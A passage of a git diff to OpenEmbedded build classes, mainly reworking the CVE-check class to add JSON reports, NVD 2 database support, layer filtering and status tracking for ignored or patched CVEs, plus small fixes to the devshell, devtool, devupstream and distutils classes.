+ index["documents"].sort(key=lambda x: x["filename"])
+
+ index_str = io.BytesIO(json.dumps(
+ index,
+ sort_keys=True,
+ indent=get_json_indent(d),
+ ).encode("utf-8"))
+
+ info = tarfile.TarInfo()
+ info.name = "index.json"
+ info.size = len(index_str.getvalue())
+ info.uid = 0
+ info.gid = 0
+ info.uname = "root"
+ info.gname = "root"
+
+ tar.addfile(info, fileobj=index_str)
diff --git a/meta/classes/create-spdx.bbclass b/meta/classes/create-spdx.bbclass
new file mode 100644
index 0000000000..19c6c0ff0b
--- /dev/null
+++ b/meta/classes/create-spdx.bbclass
@@ -0,0 +1,8 @@
+#
+# Copyright OpenEmbedded Contributors
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+# Include this class when you don't care what version of SPDX you get; it will
+# be updated to the latest stable version that is supported
+inherit create-spdx-2.2
diff --git a/meta/classes/cve-check.bbclass b/meta/classes/cve-check.bbclass
index 17f64a8a9c..5e6bae1757 100644
--- a/meta/classes/cve-check.bbclass
+++ b/meta/classes/cve-check.bbclass
@@ -20,13 +20,13 @@
# the only method to check against CVEs. Running this tool
# doesn't guarantee your packages are free of CVEs.
-# The product name that the CVE database uses. Defaults to BPN, but may need to
+# The product name that the CVE database uses defaults to BPN, but may need to
# be overriden per recipe (for example tiff.bb sets CVE_PRODUCT=libtiff).
CVE_PRODUCT ??= "${BPN}"
CVE_VERSION ??= "${PV}"
CVE_CHECK_DB_DIR ?= "${DL_DIR}/CVE_CHECK"
-CVE_CHECK_DB_FILE ?= "${CVE_CHECK_DB_DIR}/nvdcve_1.1.db"
+CVE_CHECK_DB_FILE ?= "${CVE_CHECK_DB_DIR}/nvdcve_2.db"
CVE_CHECK_DB_FILE_LOCK ?= "${CVE_CHECK_DB_FILE}.lock"
CVE_CHECK_LOG ?= "${T}/cve.log"
@@ -34,25 +34,80 @@ CVE_CHECK_TMP_FILE ?= "${TMPDIR}/cve_check"
CVE_CHECK_SUMMARY_DIR ?= "${LOG_DIR}/cve"
CVE_CHECK_SUMMARY_FILE_NAME ?= "cve-summary"
CVE_CHECK_SUMMARY_FILE ?= "${CVE_CHECK_SUMMARY_DIR}/${CVE_CHECK_SUMMARY_FILE_NAME}"
+CVE_CHECK_SUMMARY_FILE_NAME_JSON = "cve-summary.json"
+CVE_CHECK_SUMMARY_INDEX_PATH = "${CVE_CHECK_SUMMARY_DIR}/cve-summary-index.txt"
+
+CVE_CHECK_LOG_JSON ?= "${T}/cve.json"
CVE_CHECK_DIR ??= "${DEPLOY_DIR}/cve"
-CVE_CHECK_MANIFEST ?= "${DEPLOY_DIR_IMAGE}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.cve"
+CVE_CHECK_RECIPE_FILE ?= "${CVE_CHECK_DIR}/${PN}"
+CVE_CHECK_RECIPE_FILE_JSON ?= "${CVE_CHECK_DIR}/${PN}_cve.json"
+CVE_CHECK_MANIFEST ?= "${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.cve"
+CVE_CHECK_MANIFEST_JSON ?= "${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.json"
CVE_CHECK_COPY_FILES ??= "1"
CVE_CHECK_CREATE_MANIFEST ??= "1"
+# Report Patched or Ignored/Whitelisted CVEs
+CVE_CHECK_REPORT_PATCHED ??= "1"
+
+CVE_CHECK_SHOW_WARNINGS ??= "1"
+
+# Provide text output
+CVE_CHECK_FORMAT_TEXT ??= "1"
+
+# Provide JSON output - disabled by default for backward compatibility
+CVE_CHECK_FORMAT_JSON ??= "0"
+
+# Check for packages without CVEs (no issues or missing product name)
+CVE_CHECK_COVERAGE ??= "1"
+
# Whitelist for packages (PN)
CVE_CHECK_PN_WHITELIST ?= ""
# Whitelist for CVE. If a CVE is found, then it is considered patched.
# The value is a string containing space separated CVE values:
-#
+#
# CVE_CHECK_WHITELIST = 'CVE-2014-2524 CVE-2018-1234'
-#
+#
CVE_CHECK_WHITELIST ?= ""
+# Layers to be excluded
+CVE_CHECK_LAYER_EXCLUDELIST ??= ""
+
+# Layers to be included
+CVE_CHECK_LAYER_INCLUDELIST ??= ""
+
+
+# set to "alphabetical" for version using single alphabetical character as increment release
+CVE_VERSION_SUFFIX ??= ""
+
+def generate_json_report(d, out_path, link_path):
+ if os.path.exists(d.getVar("CVE_CHECK_SUMMARY_INDEX_PATH")):
+ import json
+ from oe.cve_check import cve_check_merge_jsons, update_symlinks
+
+ bb.note("Generating JSON CVE summary")
+ index_file = d.getVar("CVE_CHECK_SUMMARY_INDEX_PATH")
+ summary = {"version":"1", "package": []}
+ with open(index_file) as f:
+ filename = f.readline()
+ while filename:
+ with open(filename.rstrip()) as j:
+ data = json.load(j)
+ cve_check_merge_jsons(summary, data)
+ filename = f.readline()
+
+ summary["package"].sort(key=lambda d: d['name'])
+
+ with open(out_path, "w") as f:
+ json.dump(summary, f, indent=2)
+
+ update_symlinks(out_path, link_path)
+
python cve_save_summary_handler () {
import shutil
import datetime
+ from oe.cve_check import update_symlinks
cve_tmp_file = d.getVar("CVE_CHECK_TMP_FILE")
@@ -65,13 +120,15 @@ python cve_save_summary_handler () {
if os.path.exists(cve_tmp_file):
shutil.copyfile(cve_tmp_file, cve_summary_file)
-
- if cve_summary_file and os.path.exists(cve_summary_file):
- cvefile_link = os.path.join(cvelogpath, cve_summary_name)
-
- if os.path.exists(os.path.realpath(cvefile_link)):
- os.remove(cvefile_link)
- os.symlink(os.path.basename(cve_summary_file), cvefile_link)
+ cvefile_link = os.path.join(cvelogpath, cve_summary_name)
+ update_symlinks(cve_summary_file, cvefile_link)
+ bb.plain("Complete CVE report summary created at: %s" % cvefile_link)
+
+ if d.getVar("CVE_CHECK_FORMAT_JSON") == "1":
+ json_summary_link_name = os.path.join(cvelogpath, d.getVar("CVE_CHECK_SUMMARY_FILE_NAME_JSON"))
+ json_summary_name = os.path.join(cvelogpath, "%s-%s.json" % (cve_summary_name, timestamp))
+ generate_json_report(d, json_summary_name, json_summary_link_name)
+ bb.plain("Complete CVE JSON report summary created at: %s" % json_summary_link_name)
}
addhandler cve_save_summary_handler
@@ -81,23 +138,25 @@ python do_cve_check () {
"""
Check recipe for patched and unpatched CVEs
"""
+ from oe.cve_check import get_patched_cves
- if os.path.exists(d.getVar("CVE_CHECK_DB_FILE")):
- try:
- patched_cves = get_patches_cves(d)
- except FileNotFoundError:
- bb.fatal("Failure in searching patches")
- whitelisted, patched, unpatched = check_cves(d, patched_cves)
- if patched or unpatched:
- cve_data = get_cve_info(d, patched + unpatched)
- cve_write_data(d, patched, unpatched, whitelisted, cve_data)
- else:
- bb.note("No CVE database found, skipping CVE check")
+ with bb.utils.fileslocked([d.getVar("CVE_CHECK_DB_FILE_LOCK")], shared=True):
+ if os.path.exists(d.getVar("CVE_CHECK_DB_FILE")):
+ try:
+ patched_cves = get_patched_cves(d)
+ except FileNotFoundError:
+ bb.fatal("Failure in searching patches")
+ ignored, patched, unpatched, status = check_cves(d, patched_cves)
+ if patched or unpatched or (d.getVar("CVE_CHECK_COVERAGE") == "1" and status):
+ cve_data = get_cve_info(d, patched + unpatched + ignored)
+ cve_write_data(d, patched, unpatched, ignored, cve_data, status)
+ else:
+ bb.note("No CVE database found, skipping CVE check")
}
-addtask cve_check before do_build after do_fetch
-do_cve_check[depends] = "cve-update-db-native:do_populate_cve_db"
+addtask cve_check before do_build
+do_cve_check[depends] = "cve-update-nvd2-native:do_fetch"
do_cve_check[nostamp] = "1"
python cve_check_cleanup () {
@@ -105,10 +164,11 @@ python cve_check_cleanup () {
Delete the file used to gather all the CVE information.
"""
bb.utils.remove(e.data.getVar("CVE_CHECK_TMP_FILE"))
+ bb.utils.remove(e.data.getVar("CVE_CHECK_SUMMARY_INDEX_PATH"))
}
addhandler cve_check_cleanup
-cve_check_cleanup[eventmask] = "bb.cooker.CookerExit"
+cve_check_cleanup[eventmask] = "bb.event.BuildCompleted"
python cve_check_write_rootfs_manifest () {
"""
@@ -116,111 +176,107 @@ python cve_check_write_rootfs_manifest () {
"""
import shutil
+ import json
+ from oe.rootfs import image_list_installed_packages
+ from oe.cve_check import cve_check_merge_jsons, update_symlinks
if d.getVar("CVE_CHECK_COPY_FILES") == "1":
- deploy_file = os.path.join(d.getVar("CVE_CHECK_DIR"), d.getVar("PN"))
+ deploy_file = d.getVar("CVE_CHECK_RECIPE_FILE")
if os.path.exists(deploy_file):
bb.utils.remove(deploy_file)
-
- if os.path.exists(d.getVar("CVE_CHECK_TMP_FILE")):
- bb.note("Writing rootfs CVE manifest")
- deploy_dir = d.getVar("DEPLOY_DIR_IMAGE")
- link_name = d.getVar("IMAGE_LINK_NAME")
+ deploy_file_json = d.getVar("CVE_CHECK_RECIPE_FILE_JSON")
+ if os.path.exists(deploy_file_json):
+ bb.utils.remove(deploy_file_json)
+
+ # Create a list of relevant recipies
+ recipies = set()
+ for pkg in list(image_list_installed_packages(d)):
+ pkg_info = os.path.join(d.getVar('PKGDATA_DIR'),
+ 'runtime-reverse', pkg)
+ pkg_data = oe.packagedata.read_pkgdatafile(pkg_info)
+ recipies.add(pkg_data["PN"])
+
+ bb.note("Writing rootfs CVE manifest")
+ deploy_dir = d.getVar("IMGDEPLOYDIR")
+ link_name = d.getVar("IMAGE_LINK_NAME")
+
+ json_data = {"version":"1", "package": []}
+ text_data = ""
+ enable_json = d.getVar("CVE_CHECK_FORMAT_JSON") == "1"
+ enable_text = d.getVar("CVE_CHECK_FORMAT_TEXT") == "1"
+
+ save_pn = d.getVar("PN")
+
+ for pkg in recipies:
+ # To be able to use the CVE_CHECK_RECIPE_FILE variable we have to evaluate
+ # it with the different PN names set each time.
+ d.setVar("PN", pkg)
+ if enable_text:
+ pkgfilepath = d.getVar("CVE_CHECK_RECIPE_FILE")
+ if os.path.exists(pkgfilepath):
+ with open(pkgfilepath) as pfile:
+ text_data += pfile.read()
+
+ if enable_json:
+ pkgfilepath = d.getVar("CVE_CHECK_RECIPE_FILE_JSON")
+ if os.path.exists(pkgfilepath):
+ with open(pkgfilepath) as j:
+ data = json.load(j)
+ cve_check_merge_jsons(json_data, data)
+
+ d.setVar("PN", save_pn)
+
+ if enable_text:
+ link_path = os.path.join(deploy_dir, "%s.cve" % link_name)
manifest_name = d.getVar("CVE_CHECK_MANIFEST")
- cve_tmp_file = d.getVar("CVE_CHECK_TMP_FILE")
- shutil.copyfile(cve_tmp_file, manifest_name)
+ with open(manifest_name, "w") as f:
+ f.write(text_data)
- if manifest_name and os.path.exists(manifest_name):
- manifest_link = os.path.join(deploy_dir, "%s.cve" % link_name)
- # If we already have another manifest, update symlinks
- if os.path.exists(os.path.realpath(manifest_link)):
- os.remove(manifest_link)
- os.symlink(os.path.basename(manifest_name), manifest_link)
- bb.plain("Image CVE report stored in: %s" % manifest_name)
-}
+ update_symlinks(manifest_name, link_path)
+ bb.plain("Image CVE report stored in: %s" % manifest_name)
-ROOTFS_POSTPROCESS_COMMAND_prepend = "${@'cve_check_write_rootfs_manifest; ' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
-do_rootfs[recrdeptask] += "${@'do_cve_check' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
-
-def get_patches_cves(d):
- """
- Get patches that solve CVEs using the "CVE: " tag.
- """
-
- import re
+ if enable_json:
+ link_path = os.path.join(deploy_dir, "%s.json" % link_name)
+ manifest_name = d.getVar("CVE_CHECK_MANIFEST_JSON")
- pn = d.getVar("PN")
- cve_match = re.compile("CVE:( CVE\-\d{4}\-\d+)+")
-
- # Matches last CVE-1234-211432 in the file name, also if written
- # with small letters. Not supporting multiple CVE id's in a single
- # file name.
- cve_file_name_match = re.compile(".*([Cc][Vv][Ee]\-\d{4}\-\d+)")
-
- patched_cves = set()
- bb.debug(2, "Looking for patches that solves CVEs for %s" % pn)
- for url in src_patches(d):
- patch_file = bb.fetch.decodeurl(url)[2]
-
- if not os.path.isfile(patch_file):
- bb.error("File Not found: %s" % patch_file)
- raise FileNotFoundError
-
- # Check patch file name for CVE ID
- fname_match = cve_file_name_match.search(patch_file)
- if fname_match:
- cve = fname_match.group(1).upper()
- patched_cves.add(cve)
- bb.debug(2, "Found CVE %s from patch file name %s" % (cve, patch_file))
-
- with open(patch_file, "r", encoding="utf-8") as f:
- try:
- patch_text = f.read()
- except UnicodeDecodeError:
- bb.debug(1, "Failed to read patch %s using UTF-8 encoding"
- " trying with iso8859-1" % patch_file)
- f.close()
- with open(patch_file, "r", encoding="iso8859-1") as f:
- patch_text = f.read()
-
- # Search for one or more "CVE: " lines
- text_match = False
- for match in cve_match.finditer(patch_text):
- # Get only the CVEs without the "CVE: " tag
- cves = patch_text[match.start()+5:match.end()]
- for cve in cves.split():
- bb.debug(2, "Patch %s solves %s" % (patch_file, cve))
- patched_cves.add(cve)
- text_match = True
+ with open(manifest_name, "w") as f:
+ json.dump(json_data, f, indent=2)
- if not fname_match and not text_match:
- bb.debug(2, "Patch %s doesn't solve CVEs" % patch_file)
+ update_symlinks(manifest_name, link_path)
+ bb.plain("Image CVE JSON report stored in: %s" % manifest_name)
+}
- return patched_cves
+ROOTFS_POSTPROCESS_COMMAND_prepend = "${@'cve_check_write_rootfs_manifest; ' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
+do_rootfs[recrdeptask] += "${@'do_cve_check' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
+do_populate_sdk[recrdeptask] += "${@'do_cve_check' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
def check_cves(d, patched_cves):
"""
Connect to the NVD database and find unpatched cves.
"""
- from distutils.version import LooseVersion
+ from oe.cve_check import Version, convert_cve_version
+
+ pn = d.getVar("PN")
+ real_pv = d.getVar("PV")
+ suffix = d.getVar("CVE_VERSION_SUFFIX")
cves_unpatched = []
+ cves_ignored = []
+ cves_status = []
+ cves_in_recipe = False
# CVE_PRODUCT can contain more than one product (eg. curl/libcurl)
products = d.getVar("CVE_PRODUCT").split()
# If this has been unset then we're not scanning for CVEs here (for example, image recipes)
if not products:
- return ([], [], [])
+ return ([], [], [], [])
pv = d.getVar("CVE_VERSION").split("+git")[0]
- # If the recipe has been whitlisted we return empty lists
- if d.getVar("PN") in d.getVar("CVE_CHECK_PN_WHITELIST").split():
+ # If the recipe has been whitelisted we return empty lists
+ if pn in d.getVar("CVE_CHECK_PN_WHITELIST").split():
bb.note("Recipe has been whitelisted, skipping check")
- return ([], [], [])
+ return ([], [], [], [])
- old_cve_whitelist = d.getVar("CVE_CHECK_CVE_WHITELIST")
- if old_cve_whitelist:
- bb.warn("CVE_CHECK_CVE_WHITELIST is deprecated, please use CVE_CHECK_WHITELIST.")
cve_whitelist = d.getVar("CVE_CHECK_WHITELIST").split()
import sqlite3
@@ -229,36 +285,50 @@ def check_cves(d, patched_cves):
# For each of the known product names (e.g. curl has CPEs using curl and libcurl)...
for product in products:
+ cves_in_product = False
if ":" in product:
vendor, product = product.split(":", 1)
else:
vendor = "%"
# Find all relevant CVE IDs.
- for cverow in conn.execute("SELECT DISTINCT ID FROM PRODUCTS WHERE PRODUCT IS ? AND VENDOR LIKE ?", (product, vendor)):
+ cve_cursor = conn.execute("SELECT DISTINCT ID FROM PRODUCTS WHERE PRODUCT IS ? AND VENDOR LIKE ?", (product, vendor))
+ for cverow in cve_cursor:
cve = cverow[0]
if cve in cve_whitelist:
bb.note("%s-%s has been whitelisted for %s" % (product, pv, cve))
- # TODO: this should be in the report as 'whitelisted'
- patched_cves.add(cve)
+ cves_ignored.append(cve)
continue
elif cve in patched_cves:
bb.note("%s has been patched" % (cve))
continue
+ # Write status once only for each product
+ if not cves_in_product:
+ cves_status.append([product, True])
+ cves_in_product = True
+ cves_in_recipe = True
vulnerable = False
- for row in conn.execute("SELECT * FROM PRODUCTS WHERE ID IS ? AND PRODUCT IS ? AND VENDOR LIKE ?", (cve, product, vendor)):
+ ignored = False
+
+ product_cursor = conn.execute("SELECT * FROM PRODUCTS WHERE ID IS ? AND PRODUCT IS ? AND VENDOR LIKE ?", (cve, product, vendor))
+ for row in product_cursor:
(_, _, _, version_start, operator_start, version_end, operator_end) = row
#bb.debug(2, "Evaluating row " + str(row))
+ if cve in cve_whitelist:
+ ignored = True
+
+ version_start = convert_cve_version(version_start)
+ version_end = convert_cve_version(version_end)
if (operator_start == '=' and pv == version_start) or version_start == '-':
vulnerable = True
else:
if operator_start:
try:
- vulnerable_start = (operator_start == '>=' and LooseVersion(pv) >= LooseVersion(version_start))
- vulnerable_start |= (operator_start == '>' and LooseVersion(pv) > LooseVersion(version_start))
+ vulnerable_start = (operator_start == '>=' and Version(pv,suffix) >= Version(version_start,suffix))
+ vulnerable_start |= (operator_start == '>' and Version(pv,suffix) > Version(version_start,suffix))
except:
bb.warn("%s: Failed to compare %s %s %s for %s" %
(product, pv, operator_start, version_start, cve))
@@ -268,8 +338,8 @@ def check_cves(d, patched_cves):
if operator_end:
try:
- vulnerable_end = (operator_end == '<=' and LooseVersion(pv) <= LooseVersion(version_end))
- vulnerable_end |= (operator_end == '<' and LooseVersion(pv) < LooseVersion(version_end))
+ vulnerable_end = (operator_end == '<=' and Version(pv,suffix) <= Version(version_end,suffix) )
+ vulnerable_end |= (operator_end == '<' and Version(pv,suffix) < Version(version_end,suffix) )
except:
bb.warn("%s: Failed to compare %s %s %s for %s" %
(product, pv, operator_end, version_end, cve))
@@ -283,18 +353,27 @@ def check_cves(d, patched_cves):
vulnerable = vulnerable_start or vulnerable_end
if vulnerable:
- bb.note("%s-%s is vulnerable to %s" % (product, pv, cve))
- cves_unpatched.append(cve)
+ if ignored:
+ bb.note("%s is ignored in %s-%s" % (cve, pn, real_pv))
+ cves_ignored.append(cve)
+ else:
+ bb.note("%s-%s is vulnerable to %s" % (pn, real_pv, cve))
+ cves_unpatched.append(cve)
break
+ product_cursor.close()
if not vulnerable:
- bb.note("%s-%s is not vulnerable to %s" % (product, pv, cve))
- # TODO: not patched but not vulnerable
+ bb.note("%s-%s is not vulnerable to %s" % (pn, real_pv, cve))
patched_cves.add(cve)
+ cve_cursor.close()
+
+ if not cves_in_product:
+ bb.note("No CVE records found for product %s, pn %s" % (product, pn))
+ cves_status.append([product, False])
conn.close()
- return (list(cve_whitelist), list(patched_cves), cves_unpatched)
+ return (list(cves_ignored), list(patched_cves), cves_unpatched, cves_status)
def get_cve_info(d, cves):
"""
@@ -304,39 +383,66 @@ def get_cve_info(d, cves):
import sqlite3
cve_data = {}
- conn = sqlite3.connect(d.getVar("CVE_CHECK_DB_FILE"))
+ db_file = d.expand("file:${CVE_CHECK_DB_FILE}?mode=ro")
+ conn = sqlite3.connect(db_file, uri=True)
for cve in cves:
- for row in conn.execute("SELECT * FROM NVD WHERE ID IS ?", (cve,)):
+ cursor = conn.execute("SELECT * FROM NVD WHERE ID IS ?", (cve,))
+ for row in cursor:
cve_data[row[0]] = {}
cve_data[row[0]]["summary"] = row[1]
cve_data[row[0]]["scorev2"] = row[2]
cve_data[row[0]]["scorev3"] = row[3]
cve_data[row[0]]["modified"] = row[4]
cve_data[row[0]]["vector"] = row[5]
-
+ cursor.close()
conn.close()
return cve_data
-def cve_write_data(d, patched, unpatched, whitelisted, cve_data):
+def cve_write_data_text(d, patched, unpatched, whitelisted, cve_data):
"""
Write CVE information in WORKDIR; and to CVE_CHECK_DIR, and
CVE manifest if enabled.
"""
cve_file = d.getVar("CVE_CHECK_LOG")
- nvd_link = "https://web.nvd.nist.gov/view/vuln/detail?vulnId="
+ fdir_name = d.getVar("FILE_DIRNAME")
+ layer = fdir_name.split("/")[-3]
+
+ include_layers = d.getVar("CVE_CHECK_LAYER_INCLUDELIST").split()
+ exclude_layers = d.getVar("CVE_CHECK_LAYER_EXCLUDELIST").split()
+
+ report_all = d.getVar("CVE_CHECK_REPORT_PATCHED") == "1"
+
+ if exclude_layers and layer in exclude_layers:
+ return
+
+ if include_layers and layer not in include_layers:
+ return
+
+ # Early exit, the text format does not report packages without CVEs
+ if not patched+unpatched+whitelisted:
+ return
+
+ nvd_link = "https://nvd.nist.gov/vuln/detail/"
write_string = ""
unpatched_cves = []
bb.utils.mkdirhier(os.path.dirname(cve_file))
for cve in sorted(cve_data):
+ is_patched = cve in patched
+ is_ignored = cve in whitelisted
+
+ if (is_patched or is_ignored) and not report_all:
+ continue
+
+ write_string += "LAYER: %s\n" % layer
write_string += "PACKAGE NAME: %s\n" % d.getVar("PN")
write_string += "PACKAGE VERSION: %s%s\n" % (d.getVar("EXTENDPE"), d.getVar("PV"))
write_string += "CVE: %s\n" % cve
- if cve in whitelisted:
+ if is_ignored:
write_string += "CVE STATUS: Whitelisted\n"
- elif cve in patched:
+ elif is_patched:
write_string += "CVE STATUS: Patched\n"
else:
unpatched_cves.append(cve)
@@ -347,7 +453,7 @@ def cve_write_data(d, patched, unpatched, whitelisted, cve_data):
write_string += "VECTOR: %s\n" % cve_data[cve]["vector"]
write_string += "MORE INFORMATION: %s%s\n\n" % (nvd_link, cve)
- if unpatched_cves:
+ if unpatched_cves and d.getVar("CVE_CHECK_SHOW_WARNINGS") == "1":
bb.warn("Found unpatched CVE (%s), for more information check %s" % (" ".join(unpatched_cves),cve_file))
with open(cve_file, "w") as f:
@@ -355,9 +461,8 @@ def cve_write_data(d, patched, unpatched, whitelisted, cve_data):
f.write(write_string)
if d.getVar("CVE_CHECK_COPY_FILES") == "1":
- cve_dir = d.getVar("CVE_CHECK_DIR")
- bb.utils.mkdirhier(cve_dir)
- deploy_file = os.path.join(cve_dir, d.getVar("PN"))
+ deploy_file = d.getVar("CVE_CHECK_RECIPE_FILE")
+ bb.utils.mkdirhier(os.path.dirname(deploy_file))
with open(deploy_file, "w") as f:
f.write(write_string)
@@ -367,3 +472,119 @@ def cve_write_data(d, patched, unpatched, whitelisted, cve_data):
with open(d.getVar("CVE_CHECK_TMP_FILE"), "a") as f:
f.write("%s" % write_string)
+
+def cve_check_write_json_output(d, output, direct_file, deploy_file, manifest_file):
+ """
+ Write CVE information in the JSON format: to WORKDIR; and to
+ CVE_CHECK_DIR, if CVE manifest if enabled, write fragment
+ files that will be assembled at the end in cve_check_write_rootfs_manifest.
+ """
+
+ import json
+
+ write_string = json.dumps(output, indent=2)
+ with open(direct_file, "w") as f:
+ bb.note("Writing file %s with CVE information" % direct_file)
+ f.write(write_string)
+
+ if d.getVar("CVE_CHECK_COPY_FILES") == "1":
+ bb.utils.mkdirhier(os.path.dirname(deploy_file))
+ with open(deploy_file, "w") as f:
+ f.write(write_string)
+
+ if d.getVar("CVE_CHECK_CREATE_MANIFEST") == "1":
+ cvelogpath = d.getVar("CVE_CHECK_SUMMARY_DIR")
+ index_path = d.getVar("CVE_CHECK_SUMMARY_INDEX_PATH")
+ bb.utils.mkdirhier(cvelogpath)
+ fragment_file = os.path.basename(deploy_file)
+ fragment_path = os.path.join(cvelogpath, fragment_file)
+ with open(fragment_path, "w") as f:
+ f.write(write_string)
+ with open(index_path, "a+") as f:
+ f.write("%s\n" % fragment_path)
+
+def cve_write_data_json(d, patched, unpatched, ignored, cve_data, cve_status):
+ """
+ Prepare CVE data for the JSON format, then write it.
+ """
+
+ output = {"version":"1", "package": []}
+ nvd_link = "https://nvd.nist.gov/vuln/detail/"
+
+ fdir_name = d.getVar("FILE_DIRNAME")
+ layer = fdir_name.split("/")[-3]
+
+ include_layers = d.getVar("CVE_CHECK_LAYER_INCLUDELIST").split()
+ exclude_layers = d.getVar("CVE_CHECK_LAYER_EXCLUDELIST").split()
+
+ report_all = d.getVar("CVE_CHECK_REPORT_PATCHED") == "1"
+
+ if exclude_layers and layer in exclude_layers:
+ return
+
+ if include_layers and layer not in include_layers:
+ return
+
+ unpatched_cves = []
+
+ product_data = []
+ for s in cve_status:
+ p = {"product": s[0], "cvesInRecord": "Yes"}
+ if s[1] == False:
+ p["cvesInRecord"] = "No"
+ product_data.append(p)
+
+ package_version = "%s%s" % (d.getVar("EXTENDPE"), d.getVar("PV"))
+ package_data = {
+ "name" : d.getVar("PN"),
+ "layer" : layer,
+ "version" : package_version,
+ "products": product_data
+ }
+ cve_list = []
+
+ for cve in sorted(cve_data):
+ is_patched = cve in patched
+ is_ignored = cve in ignored
+ status = "Unpatched"
+ if (is_patched or is_ignored) and not report_all:
+ continue
+ if is_ignored:
+ status = "Ignored"
+ elif is_patched:
+ status = "Patched"
+ else:
+ # default value of status is Unpatched
+ unpatched_cves.append(cve)
+
+ issue_link = "%s%s" % (nvd_link, cve)
+
+ cve_item = {
+ "id" : cve,
+ "summary" : cve_data[cve]["summary"],
+ "scorev2" : cve_data[cve]["scorev2"],
+ "scorev3" : cve_data[cve]["scorev3"],
+ "vector" : cve_data[cve]["vector"],
+ "status" : status,
+ "link": issue_link
+ }
+ cve_list.append(cve_item)
+
+ package_data["issue"] = cve_list
+ output["package"].append(package_data)
+
+ direct_file = d.getVar("CVE_CHECK_LOG_JSON")
+ deploy_file = d.getVar("CVE_CHECK_RECIPE_FILE_JSON")
+ manifest_file = d.getVar("CVE_CHECK_SUMMARY_FILE_NAME_JSON")
+
+ cve_check_write_json_output(d, output, direct_file, deploy_file, manifest_file)
+
+def cve_write_data(d, patched, unpatched, ignored, cve_data, status):
+ """
+ Write CVE data in each enabled format.
+ """
+
+ if d.getVar("CVE_CHECK_FORMAT_TEXT") == "1":
+ cve_write_data_text(d, patched, unpatched, ignored, cve_data)
+ if d.getVar("CVE_CHECK_FORMAT_JSON") == "1":
+ cve_write_data_json(d, patched, unpatched, ignored, cve_data, status)
diff --git a/meta/classes/devshell.bbclass b/meta/classes/devshell.bbclass
index fdf7dc100f..76dd0b42ee 100644
--- a/meta/classes/devshell.bbclass
+++ b/meta/classes/devshell.bbclass
@@ -128,6 +128,7 @@ def devpyshell(d):
more = i.runsource(source, "<pyshell>")
if not more:
buf = []
+ sys.stderr.flush()
prompt(more)
except KeyboardInterrupt:
i.write("\nKeyboardInterrupt\n")
diff --git a/meta/classes/devtool-source.bbclass b/meta/classes/devtool-source.bbclass
index 280d6009f3..41900e651f 100644
--- a/meta/classes/devtool-source.bbclass
+++ b/meta/classes/devtool-source.bbclass
@@ -199,6 +199,7 @@ python devtool_post_patch() {
# Run do_patch function with the override applied
localdata = bb.data.createCopy(d)
localdata.setVar('OVERRIDES', ':'.join(no_overrides))
+ localdata.setVar('FILESOVERRIDES', ':'.join(no_overrides))
bb.build.exec_func('do_patch', localdata)
rm_patches()
# Now we need to reconcile the dev branch with the no-overrides one
@@ -216,7 +217,8 @@ python devtool_post_patch() {
# Reset back to the initial commit on a new branch
bb.process.run('git checkout %s -b devtool-override-%s' % (initial_rev, override), cwd=srcsubdir)
# Run do_patch function with the override applied
- localdata.appendVar('OVERRIDES', ':%s' % override)
+ localdata.setVar('OVERRIDES', ':'.join(no_overrides + [override]))
+ localdata.setVar('FILESOVERRIDES', ':'.join(no_overrides + [override]))
bb.build.exec_func('do_patch', localdata)
rm_patches()
# Now we need to reconcile the new branch with the no-overrides one
diff --git a/meta/classes/devupstream.bbclass b/meta/classes/devupstream.bbclass
index 7780c5482c..97e137cb40 100644
--- a/meta/classes/devupstream.bbclass
+++ b/meta/classes/devupstream.bbclass
@@ -4,7 +4,7 @@
#
# Usage:
# BBCLASSEXTEND = "devupstream:target"
-# SRC_URI_class-devupstream = "git://git.example.com/example"
+# SRC_URI_class-devupstream = "git://git.example.com/example;branch=master"
# SRCREV_class-devupstream = "abcdef"
#
# If the first entry in SRC_URI is a git: URL then S is rewritten to
diff --git a/meta/classes/distutils-common-base.bbclass b/meta/classes/distutils-common-base.bbclass
index 94b5fd426d..43a38e5a3a 100644
--- a/meta/classes/distutils-common-base.bbclass
+++ b/meta/classes/distutils-common-base.bbclass
@@ -11,7 +11,7 @@ export LDCXXSHARED = "${CXX} -shared"
export CCSHARED = "-fPIC -DPIC"
# LINKFORSHARED are the flags passed to the $(CC) command that links
# the python executable
-export LINKFORSHARED = "{SECURITY_CFLAGS} -Xlinker -export-dynamic"
+export LINKFORSHARED = "${SECURITY_CFLAGS} -Xlinker -export-dynamic"
FILES_${PN} += "${libdir}/* ${libdir}/${PYTHON_DIR}/*"
diff --git a/meta/classes/distutils3-base.bbclass b/meta/classes/distutils3-base.bbclass
index 7dbf07ac4b..a277d1c7bc 100644
--- a/meta/classes/distutils3-base.bbclass
+++ b/meta/classes/distutils3-base.bbclass
@@ -1,5 +1,5 @@
DEPENDS += "${@["${PYTHON_PN}-native ${PYTHON_PN}", ""][(d.getVar('PACKAGES') == '')]}"
RDEPENDS_${PN} += "${@['', '${PYTHON_PN}-core']['${CLASSOVERRIDE}' == 'class-target']}"
-inherit distutils-common-base python3native
+inherit distutils-common-base python3native python3targetconfig
diff --git a/meta/classes/distutils3.bbclass b/meta/classes/distutils3.bbclass
index 7356b5245a..a916a8000c 100644
--- a/meta/classes/distutils3.bbclass
+++ b/meta/classes/distutils3.bbclass
@@ -12,28 +12,30 @@ DISTUTILS_INSTALL_ARGS ?= "--root=${D} \
DISTUTILS_PYTHON = "python3"
DISTUTILS_PYTHON_class-native = "nativepython3"
+DISTUTILS_SETUP_PATH ?= "${S}"
+
distutils3_do_configure() {
:
}
distutils3_do_compile() {
- cd ${S}
+ cd ${DISTUTILS_SETUP_PATH}
NO_FETCH_BUILD=1 \
STAGING_INCDIR=${STAGING_INCDIR} \
STAGING_LIBDIR=${STAGING_LIBDIR} \
- ${STAGING_BINDIR_NATIVE}/${PYTHON_PN}-native/${PYTHON_PN} ${S}/setup.py \
+ ${STAGING_BINDIR_NATIVE}/${PYTHON_PN}-native/${PYTHON_PN} setup.py \
build --build-base=${B} ${DISTUTILS_BUILD_ARGS} || \
